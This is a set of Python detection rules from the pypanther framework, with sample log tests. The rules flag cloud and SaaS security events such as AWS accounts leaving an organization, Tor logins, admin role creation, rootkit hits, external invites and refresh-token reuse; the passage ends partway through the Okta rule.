    default_runbook = "Determine if the attempt was successful. Monitor and potentially suspect the user account which  attempted the action. Determine if the root account is compromised.\n"
    summary_attributes = ["p_any_ip_addresses", "p_any_aws_account_ids"]
    tags = [
        "AWS CloudTrail",
        "Defense Evasion",
        "Impair Defenses",
        "Disable or Modify Cloud Logs",
        "Modify Cloud Resource Hierarchy",
        "Beta",
    ]

    def rule(self, event: PantherEvent) -> bool:
        return event.get("eventName") == "LeaveOrganization"

    def title(self, event: PantherEvent) -> str:
        account_name = event.get("recipientAccountId")
        actor = event.udm("actor_user")
        # Return a more informative message if the attempt was unsuccessful
        if not aws_cloudtrail_success(event):
            return f"Failed attempt to remove {account_name} from your AWS organization by {actor}"
        return f"Account {account_name} has been removed from your AWS organization by {actor}"

    def severity(self, event: PantherEvent) -> str:
        # Downgrade to HIGH if attempt is unsuccessful
        if not aws_cloudtrail_success(event):
            return "HIGH"
        return "DEFAULT"

    def alert_context(self, event: PantherEvent) -> dict:
        return aws_rule_context(event)

    tests = [
        RuleTest(
            name="Failed Attempt to Leave Org",
            expected_result=True,
            log={
                "p_event_time": "2025-01-20 15:59:33.000000000",
                "p_log_type": "AWS.CloudTrail",
                "p_parse_time": "2025-01-20 16:05:54.322564138",
                "awsRegion": "us-east-1",
                "errorCode": "AccessDenied",
                "errorMessage": "User: arn:aws:sts::111122223333:assumed-role/SampleRole/SampleSession is not authorized to perform: organizations:LeaveOrganization on resource: * because no identity-based policy allows the organizations:LeaveOrganization action",
                "eventCategory": "Management",
                "eventID": "f52c1358-4ddb-4453-a676-3f4dbc64d713",
                "eventName": "LeaveOrganization",
                "eventSource": "organizations.amazonaws.com",
                "eventTime": "2025-01-20 15:59:33.000000000",
                "eventType": "AwsApiCall",
                "eventVersion": "1.09",
                "managementEvent": True,
                "readOnly": False,
                "recipientAccountId": "111122223333",
                "requestID": "67dce4b9-c7d1-4c91-a686-d34bbd5365eb",
                "sourceIPAddress": "1.2.3.4",
                "tlsDetails": {
                    "cipherSuite": "TLS_AES_128_GCM_SHA256",
                    "clientProvidedHostHeader": "organizations.us-east-1.amazonaws.com",
                    "tlsVersion": "TLSv1.3",
                },
                "userAgent": "example-user-agent",
                "userIdentity": {
                    "accessKeyId": "SAMPLE_ACCESS_KEY",
                    "accountId": "111122223333",
                    "arn": "arn:aws:sts::111122223333:assumed-role/SampleRole/SampleSession",
                    "principalId": "SAMPLE_PRINCIPAL_ID:SampleSession",
                    "sessionContext": {
                        "attributes": {"creationDate": "2025-01-20T15:59:30Z", "mfaAuthenticated": "false"},
                        "sessionIssuer": {
                            "accountId": "111122223333",
                            "arn": "arn:aws:iam::111122223333:role/SampleRole",
                            "principalId": "SAMPLE_PRINCIPAL_ID",
                            "type": "Role",
                            "userName": "SampleRole",
                        },
                    },
                    "type": "AssumedRole",
                },
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.tor import TorExitNodes


@panther_managed
class AxoniusTorLogin(Rule):
    id = "Axonius.TorLogin-prototype"
    display_name = "Axonius login from Tor IP"
    log_types = [LogType.AXONIUS_ACTIVITY]
    tags = ["Axonius", "Tor"]
    default_severity = Severity.MEDIUM
    default_description = "Detects an Axonius login from Tor IP address"
    default_runbook = "Review the actions taken, check credentials/service user used and escalate."

    def rule(self, event):
        action = event.deep_get("event", "action", default="")
        status = event.deep_get("event", "params", "status", default="")
        if status == "successful" and action == "AuditAction.LoginFrom":
            return TorExitNodes(event).has_exit_nodes()
        return False

    def title(self, event):
        username = event.deep_get("event", "user", default="")
        return f"[Axonius] Login from {username} Detected on a TOR IP Address"

    def alert_context(self, event):
        username = event.deep_get("event", "user", default="")
        ip_address = event.deep_get("event", "params", "ip", default="")
        action = event.deep_get("event", "action", default="")
        status = event.deep_get("event", "params", "status", default="")
        context = {"username": username, "ip_address": ip_address, "action": action, "status": status}
        return context

    tests = [
        RuleTest(
            name="Benign Login",
            expected_result=False,
            log={
                "event": {
                    "action": "AuditAction.LoginFrom",
                    "category": "AuditCategory.UserSession",
                    "params": {"ip": "1.2.3.4", "status": "successful"},
                    "type": "user",
                    "user": "denethor@lotr.com",
                },
                "source": "axonius",
                "time": 1752690986.344609,
            },
        ),
        RuleTest(
            name="TOR Successful Login",
            expected_result=True,
            log={
                "event": {
                    "action": "AuditAction.LoginFrom",
                    "category": "AuditCategory.UserSession",
                    "params": {"ip": "1.2.3.4", "status": "successful"},
                    "type": "user",
                    "user": "denethor@lotr.com",
                },
                "source": "axonius",
                "time": 1752690986.344609,
                "p_enrichment": {"tor_exit_nodes": True},
            },
        ),
        RuleTest(
            name="TOR Failed Login",
            expected_result=False,
            log={
                "event": {
                    "action": "AuditAction.LoginFrom",
                    "category": "AuditCategory.UserSession",
                    "params": {"ip": "172.7.1.1", "status": "fail"},
                    "type": "user",
                    "user": "testr@axonius.com",
                },
                "source": "axonius",
                "time": 1752690986.344609,
                "p_enrichment": {"tor_exit_nodes": True},
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class NetskopeNetskopePersonnelActivity(Rule):
    id = "Netskope.NetskopePersonnelActivity-prototype"
    display_name = "Action Performed by Netskope Personnel"
    log_types = [LogType.NETSKOPE_AUDIT]
    tags = ["Netskope", "Supply Chain Compromise"]
    reports = {"MITRE ATT&CK": ["TA0001:T1195"]}
    default_severity = Severity.MEDIUM
    default_description = "An action was performed by Netskope personnel."
    default_runbook = "Action taken by Netskope Personnel.  Validate that this action was authorized."
    default_reference = "https://docs.netskope.com/en/netskope-help/admin-console/administration/audit-log/#filters-1"

    def rule(self, event):
        if event.get("is_netskope_personnel") is True:
            return True
        return False

    def title(self, event):
        user = event.get("user", "<USER_NOT_FOUND>")
        audit_log_event = event.get("audit_log_event", "<EVENT_NOT_FOUND>")
        return f"Action [{audit_log_event}] performed by Netskope personnel [{user}]"

    tests = [
        RuleTest(
            name="True positive",
            expected_result=True,
            log={
                "_id": "e5ca619b059fccdd0cfd9398",
                "_insertion_epoch_timestamp": 1702308331,
                "audit_log_event": "Login Successful",
                "count": 1,
                "is_netskope_personnel": True,
                "organization_unit": "",
                "severity_level": 2,
                "supporting_data": {"data_type": "user", "data_values": ["11.22.33.44", "adminsupport@netskope.com"]},
                "timestamp": "2023-12-11 15:25:31.000000000",
                "type": "admin_audit_logs",
                "ur_normalized": "adminsupport@netskope.com",
                "user": "adminsupport@netskope.com",
            },
        ),
        RuleTest(
            name="True negative",
            expected_result=False,
            log={
                "_id": "1e589befa3da30132362f32a",
                "_insertion_epoch_timestamp": 1702318213,
                "audit_log_event": "Rest API V2 Call",
                "count": 1,
                "is_netskope_personnel": False,
                "organization_unit": "",
                "severity_level": 2,
                "supporting_data": {
                    "data_type": "incidents",
                    "data_values": [200, "POST", "/api/v2/incidents/uba/getuci", "trid=ccb898fgrhvdd0v0lebg"],
                },
                "timestamp": "2023-12-11 18:10:13.000000000",
                "type": "admin_audit_logs",
                "ur_normalized": "service-account",
                "user": "service-account",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class GoogleWorkspaceAdvancedProtectionProgram(Rule):
    default_description = "Your organization's Google Workspace Advanced Protection Program settings were modified."
    display_name = "Google Workspace Advanced Protection Program"
    default_runbook = "Confirm the changes made were authorized for your organization."
    default_reference = "https://support.google.com/a/answer/9378686?hl=en"
    default_severity = Severity.MEDIUM
    log_types = [LogType.GSUITE_ACTIVITY_EVENT]
    id = "Google.Workspace.Advanced.Protection.Program-prototype"

    def rule(self, event):
        # Return True to match the log event and trigger an alert.
        setting_name = event.deep_get("parameters", "SETTING_NAME", default="NO_SETTING_NAME").split("-")[0].strip()
        setting_alert_flag = "Advanced Protection Program Settings"
        return event.get("name") == "CREATE_APPLICATION_SETTING" and setting_name == setting_alert_flag

    def title(self, event):
        # If no 'dedup' function is defined, the return value of this
        # method will act as deduplication string.
        setting = event.deep_get("parameters", "SETTING_NAME", default="NO_SETTING_NAME")
        setting_name = setting.split("-")[-1].strip()
        return f"Google Workspace Advanced Protection Program settings have been updated to [{setting_name}] by Google Workspace User [{event.deep_get('actor', 'email', default='<NO_EMAIL_FOUND>')}]."

    tests = [
        RuleTest(
            name="parameters json key set to null value",
            expected_result=False,
            log={
                "actor": {"callerType": "USER", "email": "user@example.io", "profileId": "111111111111111111111"},
                "id": {
                    "applicationName": "user_accounts",
                    "customerId": "C00000000",
                    "time": "2022-12-29 22:42:44.467000000",
                    "uniqueQualifier": "517500000000000000",
                },
                "parameters": None,
                "ipAddress": "2600:2600:2600:2600:2600:2600:2600:2600",
                "kind": "admin#reports#activity",
                "name": "recovery_email_edit",
                "type": "recovery_info_change",
            },
        ),
        RuleTest(
            name="Allow Security Codes",
            expected_result=True,
            log={
                "actor": {"callerType": "USER", "email": "example@example.io", "profileId": "12345"},
                "id": {
                    "applicationName": "admin",
                    "customerId": "D12345",
                    "time": "2022-12-11 01:35:29.906000000",
                    "uniqueQualifier": "-12345",
                },
                "ipAddress": "12.12.12.12",
                "kind": "admin#reports#activity",
                "name": "CREATE_APPLICATION_SETTING",
                "parameters": {
                    "APPLICATION_EDITION": "standard",
                    "APPLICATION_NAME": "Security",
                    "NEW_VALUE": "ALLOWED_WITH_REMOTE_ACCESS",
                    "ORG_UNIT_NAME": "Example IO",
                    "SETTING_NAME": "Advanced Protection Program Settings - Allow security codes",
                },
                "type": "APPLICATION_SETTINGS",
            },
        ),
        RuleTest(
            name="Enable User Enrollment",
            expected_result=True,
            log={
                "actor": {"callerType": "USER", "email": "example@example.io", "profileId": "12345"},
                "id": {
                    "applicationName": "admin",
                    "customerId": "D12345",
                    "time": "2022-12-11 01:35:29.906000000",
                    "uniqueQualifier": "-12345",
                },
                "ipAddress": "12.12.12.12",
                "kind": "admin#reports#activity",
                "name": "CREATE_APPLICATION_SETTING",
                "parameters": {
                    "APPLICATION_EDITION": "standard",
                    "APPLICATION_NAME": "Security",
                    "NEW_VALUE": "true",
                    "ORG_UNIT_NAME": "Example IO",
                    "SETTING_NAME": "Advanced Protection Program Settings - Enable user enrollment",
                },
                "type": "APPLICATION_SETTINGS",
            },
        ),
        RuleTest(
            name="New Custom Role Created",
            expected_result=False,
            log={
                "actor": {"callerType": "USER", "email": "example@example.io", "profileId": "123456"},
                "id": {
                    "applicationName": "admin",
                    "customerId": "D12345",
                    "time": "2022-12-11 02:57:48.693000000",
                    "uniqueQualifier": "-12456",
                },
                "ipAddress": "12.12.12.12",
                "kind": "admin#reports#activity",
                "name": "CREATE_ROLE",
                "parameters": {"ROLE_ID": "567890", "ROLE_NAME": "CustomAdminRoleName"},
                "type": "DELEGATED_ADMIN_SETTINGS",
            },
        ),
        RuleTest(
            name="ListObject Type",
            expected_result=False,
            log={
                "actor": {"email": "user@example.io", "profileId": "118111111111111111111"},
                "id": {
                    "applicationName": "drive",
                    "customerId": "D12345",
                    "time": "2022-12-20 17:27:47.080000000",
                    "uniqueQualifier": "-7312729053723258069",
                },
                "ipAddress": "12.12.12.12",
                "kind": "admin#reports#activity",
                "name": "rename",
                "parameters": {
                    "actor_is_collaborator_account": None,
                    "billable": True,
                    "doc_id": "1GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG",
                    "doc_title": "Document Title- Found Here",
                    "doc_type": "presentation",
                    "is_encrypted": None,
                    "new_value": ["Document Title- Found Here"],
                    "old_value": ["Document Title- Old"],
                    "owner": "user@example.io",
                    "owner_is_shared_drive": None,
                    "owner_is_team_drive": None,
                    "primary_event": True,
                    "visibility": "private",
                },
                "type": "access",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.zscaler import zia_alert_context, zia_success


@panther_managed
class ZIACloudAccountCreated(Rule):
    id = "ZIA.Cloud.Account.Created-prototype"
    default_description = "This rule detects when new cloud account was created."
    display_name = "ZIA Cloud Account Created"
    default_runbook = (
        "Verify that this change was planned. If not, revert the change and ensure this doesn't happen again."
    )
    default_reference = "https://help.zscaler.com/zia/choosing-provisioning-and-authentication-methods"
    default_severity = Severity.MEDIUM
    reports = {"MITRE ATT&CK": ["TA0003:T1136.003"]}
    log_types = [LogType.ZSCALER_ZIA_ADMIN_AUDIT_LOG]

    def rule(self, event):
        if not zia_success(event):
            return False
        action = event.deep_get("event", "action", default="ACTION_NOT_FOUND")
        category = event.deep_get("event", "category", default="CATEGORY_NOT_FOUND")
        role_name = event.deep_get("event", "postaction", "role", "name", default="<ROLE_NAME_NOT_FOUND>").lower()
        if (
            action == "CREATE"
            and category == "ADMINISTRATOR_MANAGEMENT"
            and ("admin" in role_name or "audit" in role_name)
        ):
            return True
        return False

    def title(self, event):
        return f"[Zscaler.ZIA]: New admin role was created by admin with id [{event.deep_get('event', 'adminid', default='<ADMIN_ID_NOT_FOUND>')}]"

    def alert_context(self, event):
        return zia_alert_context(event)

    tests = [
        RuleTest(
            name="Administration > User Management > Add User, Service Admin group",
            expected_result=False,
            log={
                "event": {
                    "action": "CREATE",
                    "adminid": "admin@16991311.zscalerbeta.net",
                    "auditlogtype": "ZIA",
                    "category": "USER_MANAGEMENT",
                    "clientip": "123.123.123.123",
                    "errorcode": "None",
                    "interface": "UI",
                    "postaction": {
                        "department": {
                            "id": 16991313,
                            "isDeleted": False,
                            "isForUnauthenticatedUser": False,
                            "isNonEditable": True,
                            "name": "Service Admin",
                        },
                        "email": "johndoe@dev-company.com",
                        "groups": [{"id": 16991312, "isNonEditable": True, "name": "Service Admin"}],
                        "id": 19752821,
                        "miscflags": 0,
                        "name": "johndoe",
                        "password": "*****",
                        "systemDefinedGroups": [],
                    },
                    "preaction": {
                        "department": {
                            "id": 16991313,
                            "isDeleted": False,
                            "isForUnauthenticatedUser": False,
                            "isNonEditable": True,
                            "name": "Service Admin",
                        },
                        "email": "johndoe@dev-company.com",
                        "groups": [{"id": 16991312, "isNonEditable": True, "name": "Service Admin"}],
                        "id": 19752821,
                        "miscflags": 0,
                        "name": "johndoe",
                        "password": "*****",
                        "systemDefinedGroups": [],
                    },
                    "recordid": "321",
                    "resource": "johndoe",
                    "result": "SUCCESS",
                    "subcategory": "USER",
                    "time": "2024-10-22 21:57:58.000000000",
                },
                "sourcetype": "zscalernss-audit",
            },
        ),
        RuleTest(
            name="Administration Management > Administrators > Add Administrator",
            expected_result=True,
            log={
                "event": {
                    "action": "CREATE",
                    "adminid": "admin@16991311.zscalerbeta.net",
                    "auditlogtype": "ZIA",
                    "category": "ADMINISTRATOR_MANAGEMENT",
                    "clientip": "123.123.123.123",
                    "errorcode": "None",
                    "interface": "UI",
                    "postaction": {
                        "adminScope": {"scopeEntities": [], "scopeGroupMemberEntities": [], "type": "ORGANIZATION"},
                        "disabled": False,
                        "email": "ajohndoe@company.com",
                        "id": 19752821,
                        "isExecMobileAppEnabled": True,
                        "isPasswordLoginAllowed": True,
                        "loginName": "johndoe@dev-company.com",
                        "pwdLastModifiedTime": 1729634767,
                        "role": {
                            "deleted": False,
                            "extensions": {"adminRank": "0", "roleType": "EXEC_INSIGHT_AND_ORG_ADMIN"},
                            "id": 24354,
                            "isNameL10nTag": True,
                            "name": "Super Admin",
                        },
                        "userName": "johndoe1123",
                    },
                    "preaction": {
                        "adminScope": {"scopeEntities": [], "scopeGroupMemberEntities": [], "type": "ORGANIZATION"},
                        "disabled": False,
                        "email": "johndoe@company.com",
                        "id": 0,
                        "isAuditor": False,
                        "isDefaultAdmin": False,
                        "isExecMobileAppEnabled": True,
                        "isPasswordExpired": False,
                        "isPasswordLoginAllowed": True,
                        "loginName": "johndoe@dev-company.com",
                        "newLocationCreateAllowed": False,
                        "password": "*****",
                        "pwdLastModifiedTime": 0,
                        "role": {"deleted": False, "id": 24354, "isNameL10nTag": False, "name": "Super Admin"},
                        "userName": "johndoe1123",
                    },
                    "recordid": "326",
                    "resource": "johndoe1123",
                    "result": "SUCCESS",
                    "subcategory": "ADMINISTRATOR_ADMIN_USER",
                    "time": "2024-10-22 22:06:04.000000000",
                },
                "sourcetype": "zscalernss-audit",
            },
        ),
        RuleTest(
            name="Administration Management  > Auditors > Add Auditor",
            expected_result=True,
            log={
                "event": {
                    "action": "CREATE",
                    "adminid": "admin@16991311.zscalerbeta.net",
                    "auditlogtype": "ZIA",
                    "category": "ADMINISTRATOR_MANAGEMENT",
                    "clientip": "123.123.123.123",
                    "errorcode": "None",
                    "interface": "UI",
                    "postaction": {
                        "disabled": False,
                        "id": 19752860,
                        "isAuditor": True,
                        "loginName": "arieeel@dev-company.com",
                        "newLocationCreateAllowed": False,
                        "pwdLastModifiedTime": 0,
                        "role": {"deleted": False, "id": 30510, "isNameL10nTag": False, "name": "Auditor"},
                        "userName": "areiiiel",
                    },
                    "preaction": {
                        "adminScope": {"scopeEntities": [], "scopeGroupMemberEntities": [], "type": "ORGANIZATION"},
                        "disabled": False,
                        "id": 0,
                        "isAuditor": True,
                        "loginName": "arieeel@dev-company.com",
                        "newLocationCreateAllowed": False,
                        "password": "*****",
                        "pwdLastModifiedTime": 0,
                        "userName": "areiiiel",
                    },
                    "recordid": "328",
                    "resource": "areiiiel",
                    "result": "SUCCESS",
                    "subcategory": "ADMINISTRATOR_AUDITOR",
                    "time": "2024-10-22 22:10:28.000000000",
                },
                "sourcetype": "zscalernss-audit",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class OsqueryOSSECRootkitDetected(Rule):
    id = "Osquery.OSSECRootkitDetected-prototype"
    display_name = "OSSEC Rootkit Detected via Osquery"
    log_types = [LogType.OSQUERY_DIFFERENTIAL]
    tags = ["Osquery", "Malware", "Defense Evasion:Rootkit"]
    reports = {"MITRE ATT&CK": ["TA0005:T1014"]}
    default_severity = Severity.MEDIUM
    default_description = "Checks if any results are returned for the Osquery OSSEC Rootkit pack.\n"
    default_runbook = "Verify the presence of the rootkit and re-image the machine.\n"
    default_reference = "https://panther.com/blog/osquery-log-analysis/"
    summary_attributes = ["name", "hostIdentifier", "action"]

    def rule(self, event):
        return "ossec-rootkit" in event.get("name", "") and event.get("action") == "added"

    def title(self, event):
        return f"OSSEC rootkit found on [{event.get('hostIdentifier')}]"

    tests = [
        RuleTest(
            name="Rootkit Detected",
            expected_result=True,
            log={
                "action": "added",
                "calendarTime": "Tue Sep 11 16:14:21 2018 UTC",
                "columns": {
                    "build_distro": "10.12",
                    "build_platform": "darwin",
                    "config_hash": "1111",
                    "config_valid": "1",
                    "counter": "14",
                    "global_state": "0",
                    "extensions": "active",
                    "instance_id": "1111",
                    "pid": "223",
                    "resident_size": "54894592",
                    "start_time": "1536634519",
                    "system_time": "12472",
                    "user_time": "31800",
                    "uuid": "37821E12-CC8A-5AA3-A90C-FAB28A5BF8F9",
                    "version": "3.2.6",
                    "watcher": "92",
                },
                "counter": "255",
                "decorations": {"host_uuid": "1111", "environment": "corp"},
                "epoch": "0",
                "hostIdentifier": "test.lan",
                "log_type": "result",
                "name": "pack_ossec-rootkit_pwned",
                "unixTime": "1536682461",
            },
        ),
        RuleTest(
            name="Rootkit Not Detected",
            expected_result=False,
            log={
                "action": "added",
                "calendarTime": "Tue Sep 11 16:14:21 2018 UTC",
                "columns": {
                    "build_distro": "10.12",
                    "build_platform": "darwin",
                    "config_hash": "1111",
                    "config_valid": "1",
                    "counter": "14",
                    "global_state": "2",
                    "extensions": "active",
                    "instance_id": "1111",
                    "pid": "223",
                    "resident_size": "54894592",
                    "start_time": "1536634519",
                    "system_time": "12472",
                    "user_time": "31800",
                    "uuid": "37821E12-CC8A-5AA3-A90C-FAB28A5BF8F9",
                    "version": "3.2.6",
                    "watcher": "92",
                },
                "counter": "255",
                "decorations": {"host_uuid": "1111", "environment": "corp"},
                "epoch": "0",
                "hostIdentifier": "test.lan",
                "log_type": "result",
                "name": "pack_osquery-response_alf",
                "unixTime": "1536682461",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.msft import azure_rule_context, azure_success


@panther_managed
class AzureAuditInviteExternalUsers(Rule):
    id = "Azure.Audit.InviteExternalUsers-prototype"
    display_name = "Azure Invite External Users"
    log_types = [LogType.AZURE_AUDIT]
    default_severity = Severity.LOW
    default_description = "This detection looks for a Azure users inviting external users\n"
    reports = {"MITRE ATT&CK": ["TA0001:T1078"]}
    default_runbook = "Verify the user permissions and investigate the external user details. If unauthorized, revoke access and block further invites. Update security policies.\n"
    default_reference = "https://learn.microsoft.com/en-us/entra/identity/authentication/overview-authentication"
    summary_attributes = [
        "properties:ServicePrincipalName",
        "properties:UserPrincipalName",
        "properties:initiatedBy:user:ipAddress",
    ]

    def rule(self, event):
        if not azure_success(event) or event.get("operationName") != "Invite external user":
            return False
        user_who_sent_invite = event.deep_get("properties", "initiatedBy", "user", "userPrincipalName", default="")
        user_who_received_invite = event.deep_walk(
            "properties",
            "additionalDetails",
            "value",
            return_val="last",
            default="",
        )
        domain = user_who_sent_invite.split("@")[-1]
        different_domain = not user_who_received_invite.endswith(domain)
        return different_domain

    def title(self, event):
        user_who_sent_invite = event.deep_get("properties", "initiatedBy", "user", "userPrincipalName", default="")
        user_who_received_invite = event.deep_walk(
            "properties",
            "additionalDetails",
            "value",
            return_val="last",
            default="",
        )
        return f"{user_who_sent_invite} invited {user_who_received_invite} to join as an EntraID member."

    def alert_context(self, event):
        return azure_rule_context(event)

    tests = [
        RuleTest(
            name="Successful Invite external user",
            expected_result=True,
            log={
                "callerIpAddress": "1.1.1.1",
                "category": "AuditLogs",
                "correlationId": "123456789",
                "durationMs": 0,
                "Level": 4,
                "operationName": "Invite external user",
                "operationVersion": "1.0",
                "properties": {
                    "activityDateTime": "2024-09-23 14:33:09.049661100",
                    "activityDisplayName": "Invite external user",
                    "additionalDetails": [
                        {"key": "oid", "value": "123456789"},
                        {"key": "tid", "value": "0123456789"},
                        {"key": "ipaddr", "value": "1.2.3.4"},
                        {"key": "wids", "value": "123456789"},
                        {"key": "InvitationId", "value": "123456789"},
                        {"key": "invitedUserEmailAddress", "value": "Kratos@climbingolympusrn.com"},
                    ],
                    "category": "UserManagement",
                    "correlationId": "123456789",
                    "id": "Invited Users_123456789",
                    "initiatedBy": {
                        "user": {
                            "id": "123456789",
                            "ipAddress": "1.2.3.4",
                            "roles": [],
                            "userPrincipalName": "Zeus@mtolympus.com",
                        },
                    },
                    "loggedByService": "Invited Users",
                    "operationType": "Add",
                    "result": "success",
                    "targetResources": [
                        {"administrativeUnits": [], "displayName": "Zeus.Theboss", "id": "123456789", "type": "User"},
                    ],
                },
                "resourceId": "/tenants/123456789/providers/Microsoft.aadiam",
                "resultSignature": "None",
                "tenantId": "123456789",
                "time": "2024-12-10 14:33:09.049661100",
            },
        ),
        RuleTest(
            name="Same org successful invite",
            expected_result=False,
            log={
                "callerIpAddress": "1.1.1.1",
                "category": "AuditLogs",
                "correlationId": "123456789",
                "durationMs": 0,
                "Level": 4,
                "operationName": "Invite external user",
                "operationVersion": "1.0",
                "properties": {
                    "activityDateTime": "2024-09-23 14:33:09.049661100",
                    "activityDisplayName": "Invite external user",
                    "additionalDetails": [
                        {"key": "oid", "value": "123456789"},
                        {"key": "tid", "value": "0123456789"},
                        {"key": "ipaddr", "value": "1.2.3.4"},
                        {"key": "wids", "value": "123456789"},
                        {"key": "InvitationId", "value": "123456789"},
                        {"key": "invitedUserEmailAddress", "value": "Kratos@mtolympus.com"},
                    ],
                    "category": "UserManagement",
                    "correlationId": "123456789",
                    "id": "Invited Users_123456789",
                    "initiatedBy": {
                        "user": {
                            "id": "123456789",
                            "ipAddress": "1.2.3.4",
                            "roles": [],
                            "userPrincipalName": "Zeus@mtolympus.com",
                        },
                    },
                    "loggedByService": "Invited Users",
                    "operationType": "Add",
                    "result": "success",
                    "targetResources": [
                        {"administrativeUnits": [], "displayName": "Zeus.Theboss", "id": "123456789", "type": "User"},
                    ],
                },
                "resourceId": "/tenants/123456789/providers/Microsoft.aadiam",
                "resultSignature": "None",
                "tenantId": "123456789",
                "time": "2024-12-10 14:33:09.049661100",
            },
        ),
        RuleTest(
            name="Unsuccessful invite",
            expected_result=False,
            log={
                "callerIpAddress": "1.1.1.1",
                "category": "AuditLogs",
                "correlationId": "123456789",
                "durationMs": 0,
                "Level": 4,
                "operationName": "Invite external user",
                "operationVersion": "1.0",
                "properties": {
                    "activityDateTime": "2024-09-23 14:33:09.049661100",
                    "activityDisplayName": "Invite external user",
                    "additionalDetails": [
                        {"key": "oid", "value": "123456789"},
                        {"key": "tid", "value": "0123456789"},
                        {"key": "ipaddr", "value": "1.2.3.4"},
                        {"key": "wids", "value": "123456789"},
                        {"key": "InvitationId", "value": "123456789"},
                        {"key": "invitedUserEmailAddress", "value": "Kratos@mtolympus.com"},
                    ],
                    "category": "UserManagement",
                    "correlationId": "123456789",
                    "id": "Invited Users_123456789",
                    "initiatedBy": {
                        "user": {
                            "id": "123456789",
                            "ipAddress": "1.2.3.4",
                            "roles": [],
                            "userPrincipalName": "Zeus@mtolympus.com",
                        },
                    },
                    "loggedByService": "Invited Users",
                    "operationType": "Add",
                    "result": "failed",
                    "targetResources": [
                        {"administrativeUnits": [], "displayName": "Zeus.Theboss", "id": "123456789", "type": "User"},
                    ],
                },
                "resourceId": "/tenants/123456789/providers/Microsoft.aadiam",
                "resultSignature": "None",
                "tenantId": "123456789",
                "time": "2024-12-10 14:33:09.049661100",
            },
        ),
        RuleTest(
            name="Not external invite",
            expected_result=False,
            log={
                "callerIpAddress": "1.1.1.1",
                "category": "AuditLogs",
                "correlationId": "123456789",
                "durationMs": 0,
                "Level": 4,
                "operationName": "Invite Internal User",
                "operationVersion": "1.0",
                "properties": {
                    "activityDateTime": "2024-09-23 14:33:09.049661100",
                    "activityDisplayName": "Invite external user",
                    "additionalDetails": [
                        {"key": "oid", "value": "123456789"},
                        {"key": "tid", "value": "0123456789"},
                        {"key": "ipaddr", "value": "1.2.3.4"},
                        {"key": "wids", "value": "123456789"},
                        {"key": "InvitationId", "value": "123456789"},
                        {"key": "invitedUserEmailAddress", "value": "Kratos@mtolympus.com"},
                    ],
                    "category": "UserManagement",
                    "correlationId": "123456789",
                    "id": "Invited Users_123456789",
                    "initiatedBy": {
                        "user": {
                            "id": "123456789",
                            "ipAddress": "1.2.3.4",
                            "roles": [],
                            "userPrincipalName": "Zeus@mtolympus.com",
                        },
                    },
                    "loggedByService": "Invited Users",
                    "operationType": "Add",
                    "result": "success",
                    "targetResources": [
                        {"administrativeUnits": [], "displayName": "Zeus.Theboss", "id": "123456789", "type": "User"},
                    ],
                },
                "resourceId": "/tenants/123456789/providers/Microsoft.aadiam",
                "resultSignature": "None",
                "tenantId": "123456789",
                "time": "2024-12-10 14:33:09.049661100",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class AxoniusResetApiKey(Rule):
    id = "Axonius.ResetApiKey-prototype"
    display_name = "Axonius API Key Reset"
    log_types = [LogType.AXONIUS_ACTIVITY]
    tags = ["Axonius"]
    default_severity = Severity.LOW
    default_description = "Detects an Axonius API Key Reset"
    default_runbook = "Review the actions taken, check credentials/service user used and escalate."

    def rule(self, event):
        action = event.deep_get("event", "action", default="")
        if action == "AuditAction.ResetApiKey":
            return True
        return False

    def title(self, event):
        username = event.deep_get("event", "user", default="")
        return f"[Axonius] API Key Reset for {username} Detected"

    tests = [
        RuleTest(
            name="API Key Reset",
            expected_result=True,
            log={
                "event": {
                    "action": "AuditAction.ResetApiKey",
                    "category": "AuditCategory.Settings",
                    "params": {},
                    "type": "user",
                    "user": "boss@axonius.com",
                },
                "source": "axonius",
                "time": 1752699243.486779,
            },
        ),
    ]



"""
Global helpers for Tailscale detections
"""


def tailscale_alert_context(event) -> dict:
    a_c = {}
    a_c["actor"] = event.deep_get("event", "actor", default="<NO_ACTOR_FOUND>")
    a_c["action"] = event.deep_get("event", "action", default="<NO_ACTION_FOUND>")
    return a_c


def is_tailscale_admin_console_event(event):
    origin = event.deep_get("event", "origin", default="")
    return origin == "ADMIN_CONSOLE"



from pypanther.rules.aws_guardduty.aws_guardduty_critical_sev_findings import (
    AWSGuardDutyCriticalSeverityFinding as AWSGuardDutyCriticalSeverityFinding,
)
from pypanther.rules.aws_guardduty.aws_guardduty_high_sev_findings import (
    AWSGuardDutyHighSeverityFinding as AWSGuardDutyHighSeverityFinding,
)
from pypanther.rules.aws_guardduty.aws_guardduty_low_sev_findings import (
    AWSGuardDutyLowSeverityFinding as AWSGuardDutyLowSeverityFinding,
)
from pypanther.rules.aws_guardduty.aws_guardduty_med_sev_findings import (
    AWSGuardDutyMediumSeverityFinding as AWSGuardDutyMediumSeverityFinding,
)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.okta import okta_alert_context


@panther_managed
class OktaRefreshAccessTokenReuse(Rule):
    default_description = "When a client wants to renew an access token, it sends the refresh token with the access token request to the /token Okta endpoint.\nOkta validates the incoming refresh token, issues a new set of tokens and invalidates the refresh token that was passed with the initial request.\nThis detection alerts when a previously used refresh token is used again with the token request"
    default_reference = "https://developer.okta.com/docs/guides/refresh-tokens/main/#refresh-token-reuse-detection"
    display_name = "Okta App Refresh Access Token Reuse"
    default_runbook = "Determine if the clientip is anomalous. Revoke tokens if deemed suspicious."
    default_severity = Severity.MEDIUM
    log_types = [LogType.OKTA_SYSTEM_LOG]
    id = "Okta.Refresh.Access.Token.Reuse-prototype"

    def rule(self, event):
        return event.get("eventtype") in ("app.oauth2.as.token.detect_reuse", "app.oauth2.token.detect_reuse")

    def title(self, event):
        return f"Okta Access Token Reuse Attempted by [{event.get('client', {}).get('ipAddress')}] [{event.get('actor', {}).get('displayName', '<no-displayname-found>')}]"

    def alert_context(self, event):
